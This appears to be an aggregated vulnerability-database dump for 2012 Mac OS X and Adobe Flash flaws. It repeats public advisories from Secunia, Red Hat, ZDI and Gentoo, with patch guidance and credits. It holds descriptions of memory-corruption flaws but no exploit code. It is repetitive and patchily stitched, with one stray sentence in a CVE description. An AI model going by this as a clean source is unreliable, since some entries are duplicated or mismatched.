An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
This issue affects Mac OS X 10.6.8, Mac OS X Server 10.6.8, Mac OS X Lion 10.7 to 10.7.2 and
Mac OS X Lion Server 10.7 to 10.7.2. ----------------------------------------------------------------------
SC Magazine awards the Secunia CSI a 5-Star rating
Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296
----------------------------------------------------------------------
TITLE:
Apple Mac OS X Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA47843
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47843/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47843
RELEASE DATE:
2012-02-03
DISCUSS ADVISORY:
http://secunia.com/advisories/47843/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/47843/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47843
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.
1) The Address Book component downgrades to an unencrypted connection
when an encrypted connection fails. This can be exploited to intercept
CardDAV data.
2) An error in the bundled version of Apache can be exploited to
cause a temporary DoS (Denial of Service).
For more information:
SA46013
3) A design error in Apache within the Secure Sockets Layer 3.0 (SSL)
and Transport Layer Security 1.0 (TLS) protocols when using a block
cipher in CBC mode can be exploited to decrypt data protected by
SSL.
5) An error in CFNetwork when handling URLs can be exploited to
disclose sensitive information via a specially crafted web page as a
request could be sent to an incorrect origin server.
6) An error in CFNetwork when handling URLs can be exploited to
disclose sensitive information via a specially crafted web page as
unexpected request headers could be sent.
7) An integer overflow error in ColorSync when handling images with
embedded ColorSync profiles can be exploited to cause a heap-based
buffer overflow via a specially crafted image.
8) An error in CoreAudio when handling AAC encoded audio streams can
be exploited to cause a buffer overflow when playing specially
crafted audio content.
9) An error in CoreMedia when handling H.264 encoded movies can be
exploited to cause a heap-based buffer overflow.
10) A use-after-free error in CoreText when handling documents
containing fonts can be exploited to dereference already freed memory
via a specially crafted font.
11) An error exists in CoreUI when handling long URLs and can be
exploited via a specially crafted website.
12) An error in curl can be exploited by remote servers to
impersonate clients via GSSAPI requests.
For more information:
SA45067
13) Two of the certificate authorities in the list of trusted root
certificates have issued intermediate certificates to DigiCert
Malaysia, who has issued certificates with weak keys that cannot be
revoked.
14) A design error in dovecot within the Secure Sockets Layer 3.0
(SSL) and Transport Layer Security 1.0 (TLS) protocols when using a
block cipher in CBC mode can be exploited to decrypt data protected
by SSL.
15) An error in the uncompress command line tool when decompressing
compressed files can be exploited to cause a buffer overflow.
For more information:
SA45544
16) An error in ImageIO when parsing TIFF images can be exploited to
cause a buffer overflow.
For more information see vulnerability #9:
SA45325
17) An error in ImageIO when handling ThunderScan encoded TIFF images
can be exploited to cause a buffer overflow.
For more information see vulnerability #2:
SA43593:
18) An error exists in the bundled version of libpng.
For more information:
SA46148
19) An error in Internet Sharing may cause the used Wi-Fi
configuration to revert to factory defaults (e.g. disabling the WEP
password) after a system update.
20) An error in Libinfo can be exploited to disclose sensitive
information via a specially crafted website.
For more information see vulnerability #4:
SA46747
21) An integer overflow error in libresolv when parsing DNS resource
records can be exploited to cause a heap-based buffer overflow.
22) An error in libsecurity may cause some EV certificates to be
trusted even when the corresponding root is marked untrusted.
23) Multiple errors in OpenGL when handling GLSL compilation can be
exploited to corrupt memory.
24) Multiple errors exist in the bundled version of PHP.
For more information:
SA44874
SA45678
25) Various errors in FreeType when handling Type 1 fonts can be
exploited to corrupt memory.
For more information:
SA46575
26) An error in QuickTime when parsing MP4 encoded files can be
exploited to access uninitialised memory.
27) A signedness error in QuickTime when handling font tables
embedded in movie files can be exploited to corrupt memory.
28) An off-by-one error in QuickTime when handling rdrf atoms in
movie files can be exploited to cause a single byte buffer overflow.
29) An error in QuickTime when parsing JPEG2000 images can be
exploited to cause a buffer overflow.
30) An error in QuickTime when parsing PNG images can be exploited to
cause a buffer overflow.
31) An error in QuickTime when handling FLC encoded movie files can
be exploited to cause a buffer overflow.
32) Multiple errors exists in the bundled version of SquirrelMail.
For more information:
SA40307
SA45197
33) Various errors exist in the bundled version of Subversion.
For more information:
SA44681
34) Time Machine does not verify that a designated remote AFP volume
or Time Capsule is used for subsequent backups. This can be exploited
to access backups by spoofing the remote volume.
35) Errors exist in the bundled version of Tomcat.
For more information:
SA44981
36) An error in WebDAV Sharing when handling user authentication can
be exploited by local users to gain escalated privileges.
37) An error exists in the bundled version of Webmail.
For more information:
SA45605
SOLUTION:
Update to OS X Lion version 10.7.3 or apply Security Update 2012-001.
PROVIDED AND/OR DISCOVERED BY:
4, 10) Will Dormann, CERT/CC
The vendor also credits:
1) Bernard Desruisseaux, Oracle Corporation
5, 6) Erling Ellingsen, Facebook
7) binaryproof via ZDI
8, 27, 28, 29, 30) Luigi Auriemma via ZDI
9) Scott Stender, iSEC Partners
11) Ben Syverson
19) An anonymous person
21) Ilja van Sprundel, IOActive
22) Alastair Houghton
23) Chris Evans, Google Chrome Security Team and Marc Schoenefeld,
Red Hat Security Response Team
26) Luigi Auriemma via ZDI and pa_kt via ZDI
31) Matt "j00ru" Jurczyk via ZDI
34) Michael Roitzsch, Technische Universit\xe4t Dresden
36) Gordon Davisson, Crywolf
ORIGINAL ADVISORY:
Apple Security Update 2012-001:
http://support.apple.com/kb/HT5130
US-CERT:
http://www.kb.cert.org/vuls/id/403593
http://www.kb.cert.org/vuls/id/410281
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201202-0150 | CVE-2011-3449 | Apple Mac OS X CoreText embedded font vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Use-after-free vulnerability in CoreText in Apple Mac OS X before 10.7.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted embedded font in a document.
Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions.
The issue affects Mac OS X and Mac OS X Server versions prior to 10.7.3.
NOTE: This issue was previously discussed in BID 51798 (Apple Mac OS X Prior to 10.7.3 Multiple Security Vulnerabilities) but has been given its own record to better document it. ----------------------------------------------------------------------
SC Magazine awards the Secunia CSI a 5-Star rating
Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296
----------------------------------------------------------------------
TITLE:
Apple Mac OS X Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA47843
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47843/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47843
RELEASE DATE:
2012-02-03
DISCUSS ADVISORY:
http://secunia.com/advisories/47843/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/47843/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47843
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Apple has issued a security update for Mac OS X, which fixes multiple
vulnerabilities.
1) The Address Book component downgrades to an unencrypted connection
when an encrypted connection fails. This can be exploited to intercept
CardDAV data.
2) An error in the bundled version of Apache can be exploited to
cause a temporary DoS (Denial of Service).
For more information:
SA46013
3) A design error in Apache within the Secure Sockets Layer 3.0 (SSL)
and Transport Layer Security 1.0 (TLS) protocols when using a block
cipher in CBC mode can be exploited to decrypt data protected by
SSL.
4) An error in ATS when handling data-font files can be exploited to
corrupt memory via a specially crafted font opened by Font Book.
5) An error in CFNetwork when handling URLs can be exploited to
disclose sensitive information via a specially crafted web page as a
request could be sent to an incorrect origin server.
6) An error in CFNetwork when handling URLs can be exploited to
disclose sensitive information via a specially crafted web page as
unexpected request headers could be sent.
7) An integer overflow error in ColorSync when handling images with
embedded ColorSync profiles can be exploited to cause a heap-based
buffer overflow via a specially crafted image.
8) An error in CoreAudio when handling AAC encoded audio streams can
be exploited to cause a buffer overflow when playing specially
crafted audio content.
9) An error in CoreMedia when handling H.264 encoded movies can be
exploited to cause a heap-based buffer overflow.
10) A use-after-free error in CoreText when handling documents
containing fonts can be exploited to dereference already freed memory
via a specially crafted font.
11) An error exists in CoreUI when handling long URLs and can be
exploited via a specially crafted website.
12) An error in curl can be exploited by remote servers to
impersonate clients via GSSAPI requests.
For more information:
SA45067
13) Two of the certificate authorities in the list of trusted root
certificates have issued intermediate certificates to DigiCert
Malaysia, who has issued certificates with weak keys that cannot be
revoked.
14) A design error in dovecot within the Secure Sockets Layer 3.0
(SSL) and Transport Layer Security 1.0 (TLS) protocols when using a
block cipher in CBC mode can be exploited to decrypt data protected
by SSL.
15) An error in the uncompress command line tool when decompressing
compressed files can be exploited to cause a buffer overflow.
For more information:
SA45544
16) An error in ImageIO when parsing TIFF images can be exploited to
cause a buffer overflow.
For more information see vulnerability #9:
SA45325
17) An error in ImageIO when handling ThunderScan encoded TIFF images
can be exploited to cause a buffer overflow.
For more information see vulnerability #2:
SA43593:
18) An error exists in the bundled version of libpng.
For more information:
SA46148
19) An error in Internet Sharing may cause the used Wi-Fi
configuration to revert to factory defaults (e.g. disabling the WEP
password) after a system update.
20) An error in Libinfo can be exploited to disclose sensitive
information via a specially crafted website.
For more information see vulnerability #4:
SA46747
21) An integer overflow error in libresolv when parsing DNS resource
records can be exploited to cause a heap-based buffer overflow.
22) An error in libsecurity may cause some EV certificates to be
trusted even when the corresponding root is marked untrusted.
23) Multiple errors in OpenGL when handling GLSL compilation can be
exploited to corrupt memory.
24) Multiple errors exist in the bundled version of PHP.
For more information:
SA44874
SA45678
25) Various errors in FreeType when handling Type 1 fonts can be
exploited to corrupt memory.
For more information:
SA46575
26) An error in QuickTime when parsing MP4 encoded files can be
exploited to access uninitialised memory.
27) A signedness error in QuickTime when handling font tables
embedded in movie files can be exploited to corrupt memory.
28) An off-by-one error in QuickTime when handling rdrf atoms in
movie files can be exploited to cause a single byte buffer overflow.
29) An error in QuickTime when parsing JPEG2000 images can be
exploited to cause a buffer overflow.
30) An error in QuickTime when parsing PNG images can be exploited to
cause a buffer overflow.
31) An error in QuickTime when handling FLC encoded movie files can
be exploited to cause a buffer overflow.
32) Multiple errors exists in the bundled version of SquirrelMail.
For more information:
SA40307
SA45197
33) Various errors exist in the bundled version of Subversion.
For more information:
SA44681
34) Time Machine does not verify that a designated remote AFP volume
or Time Capsule is used for subsequent backups. This can be exploited
to access backups by spoofing the remote volume.
35) Errors exist in the bundled version of Tomcat.
For more information:
SA44981
36) An error in WebDAV Sharing when handling user authentication can
be exploited by local users to gain escalated privileges.
37) An error exists in the bundled version of Webmail.
For more information:
SA45605
SOLUTION:
Update to OS X Lion version 10.7.3 or apply Security Update 2012-001.
PROVIDED AND/OR DISCOVERED BY:
4, 10) Will Dormann, CERT/CC
The vendor also credits:
1) Bernard Desruisseaux, Oracle Corporation
5, 6) Erling Ellingsen, Facebook
7) binaryproof via ZDI
8, 27, 28, 29, 30) Luigi Auriemma via ZDI
9) Scott Stender, iSEC Partners
11) Ben Syverson
19) An anonymous person
21) Ilja van Sprundel, IOActive
22) Alastair Houghton
23) Chris Evans, Google Chrome Security Team and Marc Schoenefeld,
Red Hat Security Response Team
26) Luigi Auriemma via ZDI and pa_kt via ZDI
31) Matt "j00ru" Jurczyk via ZDI
34) Michael Roitzsch, Technische Universit\xe4t Dresden
36) Gordon Davisson, Crywolf
ORIGINAL ADVISORY:
Apple Security Update 2012-001:
http://support.apple.com/kb/HT5130
US-CERT:
http://www.kb.cert.org/vuls/id/403593
http://www.kb.cert.org/vuls/id/410281
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201202-0245 | CVE-2012-0754 | Adobe Flash Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of MP4 files. A size value is read from MP4 files and used for size calculation without proper validation. The arithmetic performed on the size value can cause integer overflows, resulting in undersized allocations. This undersized memory allocation can be subsequently overpopulated with data supplied by the input file which can be used to gain remote code execution under the context of the current process. If this function is called with id '2200' it will write a 0x01 byte to a user supplied address. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2012:0144-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html
Issue date: 2012-02-17
CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754
CVE-2012-0755 CVE-2012-0756 CVE-2012-0767
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed on the Adobe security page APSB12-03, listed
in the References section.
Multiple security flaws were found in the way flash-plugin displayed
certain SWF content. An attacker could use these flaws to create a
specially-crafted SWF file that would cause flash-plugin to crash or,
potentially, execute arbitrary code when the victim loaded a page
containing the specially-crafted SWF content. (CVE-2012-0752,
CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756)
A flaw in flash-plugin could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03)
791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0752.html
https://www.redhat.com/security/data/cve/CVE-2012-0753.html
https://www.redhat.com/security/data/cve/CVE-2012-0754.html
https://www.redhat.com/security/data/cve/CVE-2012-0755.html
https://www.redhat.com/security/data/cve/CVE-2012-0756.html
https://www.redhat.com/security/data/cve/CVE-2012-0767.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-03.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq
2hfvaUbJyuTg8og5n/gSdGc=
=7NQZ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ZDI-12-080 : Adobe Flash Player MP4 Stream Decoding Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-080
June 6, 2012
- -- CVE ID:
CVE-2012-0754
- -- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
- -- Affected Vendors:
Adobe
- -- Affected Products:
Adobe Flash Player
- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 12273. More details can
be found at:
http://www.adobe.com/support/security/bulletins/apsb12-03.html
- -- Disclosure Timeline:
2012-01-12 - Vulnerability reported to vendor
2012-06-06 - Coordinated public release of advisory
- -- Credit:
This vulnerability was discovered by:
* Alexander Gavrun
- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Furthermore, a remote attacker may be able to bypass intended access
restrictions, bypass cross-domain policy, inject arbitrary web script,
or obtain sensitive information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228"
References
==========
[ 1 ] CVE-2011-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445
[ 2 ] CVE-2011-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450
[ 3 ] CVE-2011-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451
[ 4 ] CVE-2011-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452
[ 5 ] CVE-2011-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453
[ 6 ] CVE-2011-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454
[ 7 ] CVE-2011-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455
[ 8 ] CVE-2011-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456
[ 9 ] CVE-2011-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457
[ 10 ] CVE-2011-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458
[ 11 ] CVE-2011-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459
[ 12 ] CVE-2011-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460
[ 13 ] CVE-2012-0752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752
[ 14 ] CVE-2012-0753
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753
[ 15 ] CVE-2012-0754
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754
[ 16 ] CVE-2012-0755
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755
[ 17 ] CVE-2012-0756
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756
[ 18 ] CVE-2012-0767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767
[ 19 ] CVE-2012-0768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768
[ 20 ] CVE-2012-0769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769
[ 21 ] CVE-2012-0773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201204-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA48033
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48033/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48033
RELEASE DATE:
2012-02-16
DISCUSS ADVISORY:
http://secunia.com/advisories/48033/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48033/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48033
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to conduct cross-site
scripting attacks, bypass certain security restrictions, and
compromise a user's system.
1) An unspecified error in an ActiveX Control can be exploited to
corrupt memory.
2) A type confusion error can be exploited to corrupt memory.
3) An unspecified error related to MP4 parsing can be exploited to
corrupt memory.
4) An unspecified error can be exploited to corrupt memory.
5) An unspecified error can be exploited to bypass certain security
restrictions.
6) An unspecified error can be exploited to bypass certain security
restrictions.
Successful exploitation of the vulnerabilities #1 through #6 may
allow execution of arbitrary code.
7) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
6) Reported by the vendor
7) Reported as a 0-day. The vendor additionally credits Google
The vendor also credits:
1) Xu Liu, Fortinet's FortiGuard Labs
2) Bo Qu, Palo Alto Networks
3, 4) Alexander Gavrun via ZDI
5) Eduardo Vela Nava, Google Security Team
ORIGINAL ADVISORY:
http://www.adobe.com/support/security/bulletins/apsb12-03.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201202-0241 | CVE-2012-0756 | Adobe Flash Player Vulnerable to access restrictions |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to bypass intended access restrictions via unspecified vectors, a different vulnerability than CVE-2012-0755. Adobe Flash Player Contains a vulnerability that prevents access restrictions. This vulnerability CVE-2012-0755 Is a different vulnerability.An attacker may be able to bypass access restrictions.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2012:0144-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html
Issue date: 2012-02-17
CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754
CVE-2012-0755 CVE-2012-0756 CVE-2012-0767
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
